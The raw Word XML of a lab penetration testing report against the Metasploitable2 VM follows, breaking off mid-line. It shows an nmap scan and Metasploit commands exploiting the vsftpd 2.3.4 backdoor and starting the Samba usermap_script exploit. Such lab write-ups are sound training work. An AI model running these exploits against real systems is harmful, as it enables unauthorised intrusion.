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30E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Penetration Testing Report – Metasploitable2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>This report documents the penetration test performed against the Metasploitable2 virtual machine using Kali Linux. The objective was to identify and exploit vulnerabilities in the system to demonstrate potential risks and their impact.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2. Target Information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Target IP: 192.168.74.154</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Operating System: Linux (Metasploitable2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Attacker Machine: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3. Nmap Scan Results</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.74.154</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Key open ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>21/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> – FTP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>139/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; 445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>smbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.X–4.X</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>6667/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>UnrealIRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09E00C41" wp14:editId="7342CF8F">
            <wp:extent cx="4391025" cy="2365805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71594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7074" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4418098" cy="2380391"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4.1 FTP Backdoor (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Port: 21/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">: Malicious backdoor in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Metasploit Module:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Commands Used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>set RHOST 192.168.74.154</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Successful shell access obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="045DDB1B" wp14:editId="1FAB51A9">
            <wp:extent cx="4000500" cy="2155398"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="144574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7794" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4033006" cy="2172912"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31CF5265" wp14:editId="7998B06C">
            <wp:extent cx="4095750" cy="2206717"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="21536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60343" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4125461" cy="2222725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4.2 Samba (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>smbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.X–4.X)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Ports:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 139 &amp; 445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Vulnerability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Usermap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Script Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Metasploit Module:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/multi/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Commands Used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>use exploit/multi/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>set RHOST 192.168.74.154</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00230E63" w:rsidRPr="00A61973" w:rsidRDefault="00230E63" w:rsidP="00230E63">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A61973">
        <w:rPr>
